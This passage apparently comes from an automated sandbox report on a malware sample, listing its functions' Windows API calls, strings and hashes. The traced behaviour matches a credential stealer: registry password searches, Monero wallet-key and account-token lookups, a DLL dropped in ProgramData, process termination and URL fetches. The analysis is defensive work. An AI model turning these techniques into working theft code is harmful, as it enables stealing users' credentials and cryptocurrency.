                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2507841554-0
                                      • Opcode ID: 03054770fca9d23b9ce46fa32c77e22eba347b3467d06beae5dccdda1487b0a7
                                      • Instruction ID: 81d00f29fe19fc219f84c84b5d76a42ce6ac69118de18252cb22835afa82b51d
                                      • Opcode Fuzzy Hash: 03054770fca9d23b9ce46fa32c77e22eba347b3467d06beae5dccdda1487b0a7
                                      • Instruction Fuzzy Hash: 2E5143B1E40318ABDF20DF90DD45BEE7779AB44301F108598F609AB1C1DB746A89CFA5
                                      Function 00AB012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • type_info::operator==.LIBVCRUNTIME ref: 00AB024D
                                      • ___TypeMatch.LIBVCRUNTIME ref: 00AB035B
                                      • CatchIt.LIBVCRUNTIME ref: 00AB03AC
                                      • CallUnexpected.LIBVCRUNTIME ref: 00AB04C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 2356445960-393685449
                                      • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction ID: f126844c8607d764081972f5672dae54d37a6cfb22eaa40c1d9eeec13f0bf121
                                      • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction Fuzzy Hash: 14B18671800209EFCF29EFA4C985DEFBBB9BF14314B10816AE9116B253D731DA51CB91
                                      Function 00A37330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A3739A
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A37411
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A3746D
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00A374B2
                                      • HeapFree.KERNEL32(00000000), ref: 00A374B9
                                      • task.LIBCPMTD ref: 00A375B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuetask
                                      • String ID: Password
                                      • API String ID: 775622407-3434357891
                                      • Opcode ID: 64a139873645f692cc19aecbc403395509da70ebc3ea1e8bffff9f3fe024fb69
                                      • Instruction ID: a61e317ee5c58f2927ccf17f4a121136eabbb6c423a2444262335910c914281d
                                      • Opcode Fuzzy Hash: 64a139873645f692cc19aecbc403395509da70ebc3ea1e8bffff9f3fe024fb69
                                      • Instruction Fuzzy Hash: 4661FAB590426C9BDB24DB50CD55BDAB7B8BF58300F0085E9F649A6241DBB06BC9CFA0
                                      Function 00A3BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                      • lstrlen.KERNEL32(00000000), ref: 00A3BC6F
                                        • Part of subcall function 00A48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A48FE2
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 00A3BC9D
                                      • lstrlen.KERNEL32(00000000), ref: 00A3BD75
                                      • lstrlen.KERNEL32(00000000), ref: 00A3BD89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 3073930149-1079375795
                                      • Opcode ID: 45b168272c95782b652bb1617bc653237f4605d178d46996c36d5236a08958ff
                                      • Instruction ID: 5a6e7a688f6efec74b53945b5e58552a1954e7e179b188a08b55988b5af3ee4c
                                      • Opcode Fuzzy Hash: 45b168272c95782b652bb1617bc653237f4605d178d46996c36d5236a08958ff
                                      • Instruction Fuzzy Hash: C6B15476950118ABDB04FBA0CEA6EEE7339FFA4301F404558F506A6191EF346E49CB72
                                      Function 00A46A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: *
                                      • API String ID: 1494266314-163128923
                                      • Opcode ID: 8af3bcedf6be85bae0c6e2f7d40151e488464d8ce2cc3b17e868cb62ea45f214
                                      • Instruction ID: 0c447188cd123a1aa5d8c7f3d7122ba565207ae5603e0e2958e7c315e0a151cd
                                      • Opcode Fuzzy Hash: 8af3bcedf6be85bae0c6e2f7d40151e488464d8ce2cc3b17e868cb62ea45f214
                                      • Instruction Fuzzy Hash: AEF03A30D08309EFD3449FE1A80979CBB30AB05747F1141A5E60DDA2D0C6706A409B62
                                      Function 00A408A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A49850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00A408DC,C:\ProgramData\chrome.dll), ref: 00A49871
                                        • Part of subcall function 00A3A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00A3A098
                                      • StrCmpCA.SHLWAPI(00000000,013188E8), ref: 00A40922
                                      • StrCmpCA.SHLWAPI(00000000,01318A48), ref: 00A40B79
                                      • StrCmpCA.SHLWAPI(00000000,013188C8), ref: 00A40A0C
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                      • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00A40C35
                                      Strings
                                      • C:\ProgramData\chrome.dll, xrefs: 00A408CD
                                      • C:\ProgramData\chrome.dll, xrefs: 00A40C30
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                      • API String ID: 585553867-663540502
                                      • Opcode ID: b321468c1850c020ca505502fa2276d4df8213eea3d157b78e017de0e4d49f89
                                      • Instruction ID: 23b26585b79c1263219b432ab7f2251f02d5e2d39d672e2566f4115a6b8efdf1
                                      • Opcode Fuzzy Hash: b321468c1850c020ca505502fa2276d4df8213eea3d157b78e017de0e4d49f89
                                      • Instruction Fuzzy Hash: BFA13575B002089FCB18EF64DA96FAD7776FFD4300F508569E90A9F251DA309A09CB92
                                      Function 00A39E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A48CF0: GetSystemTime.KERNEL32(00A50E1B,0131E198,00A505B6,?,?,00A313F9,?,0000001A,00A50E1B,00000000,?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A48D16
                                      • wsprintfA.USER32 ref: 00A39E7F
                                      • lstrcat.KERNEL32(00000000,?), ref: 00A39F03
                                      • lstrcat.KERNEL32(00000000,?), ref: 00A39F17
                                      • lstrcat.KERNEL32(00000000,00A512D8), ref: 00A39F29
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00A39F7C
                                      • Sleep.KERNEL32(00001388), ref: 00A3A013
                                        • Part of subcall function 00A499A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A499C5
                                        • Part of subcall function 00A499A0: Process32First.KERNEL32(00A3A056,00000128), ref: 00A499D9
                                        • Part of subcall function 00A499A0: Process32Next.KERNEL32(00A3A056,00000128), ref: 00A499F2
                                        • Part of subcall function 00A499A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A49A4E
                                        • Part of subcall function 00A499A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00A49A6C
                                        • Part of subcall function 00A499A0: CloseHandle.KERNEL32(00000000), ref: 00A49A79
                                        • Part of subcall function 00A499A0: CloseHandle.KERNEL32(00A3A056), ref: 00A49A88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                      • String ID: D
                                      • API String ID: 531068710-2746444292
                                      • Opcode ID: 9f3bf194d62557d982772ff1a6f78abe3d494d2ebbe97b6fa5e2608fb861aef5
                                      • Instruction ID: 72a6c976aa37914d93b890be45166776c0e4733df1a9a781341a1d52535fc0c0
                                      • Opcode Fuzzy Hash: 9f3bf194d62557d982772ff1a6f78abe3d494d2ebbe97b6fa5e2608fb861aef5
                                      • Instruction Fuzzy Hash: 525187B5D44318ABEB24DB60DC4AFDE7378AB84704F004598B60DAB2C1EB756B88CF51
                                      Function 00AAF9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00AAFA1F
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00AAFA27
                                      • _ValidateLocalCookies.LIBCMT ref: 00AAFAB0
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00AAFADB
                                      • _ValidateLocalCookies.LIBCMT ref: 00AAFB30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction ID: 29a702d4a0bb8ea1ad363dbdeeeb1f2cdf7eef84cadca99bae2a9f5a9561804c
                                      • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction Fuzzy Hash: ED41A431A00219EFCF14EFA8C984ADE7BB5FF4A314F148166E919AB392D731D905CB91
                                      Function 00A35000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A3501A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A35021
                                      • InternetOpenA.WININET(00A50DE3,00000000,00000000,00000000,00000000), ref: 00A3503A
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00A35061
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00A35091
                                      • InternetCloseHandle.WININET(?), ref: 00A35109
                                      • InternetCloseHandle.WININET(?), ref: 00A35116
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                      • String ID:
                                      • API String ID: 3066467675-0
                                      • Opcode ID: 10d4769fbc35127bfb9a1987719611764ff80f2353fcb3f97fb109619e0443b2
                                      • Instruction ID: 16dd6432440c36578ee3c4dd6bdd0870af0735231f5a1ae02e654d90f3837425
                                      • Opcode Fuzzy Hash: 10d4769fbc35127bfb9a1987719611764ff80f2353fcb3f97fb109619e0443b2
                                      • Instruction Fuzzy Hash: 3C31F6B4E44218ABDB24CF64DD85BDDB7B4BB48304F1081D9FA09A7281C7716EC58FA9
                                      Function 00A4856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A485B6
                                      • wsprintfA.USER32 ref: 00A485E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A4860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A4861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A48629
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                      • RegQueryValueExA.ADVAPI32(00000000,0131E8C8,00000000,000F003F,?,00000400), ref: 00A4867C
                                      • lstrlen.KERNEL32(?), ref: 00A48691
                                      • RegQueryValueExA.ADVAPI32(00000000,0131EB38,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00A50B3C), ref: 00A48729
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A48798
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A487AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
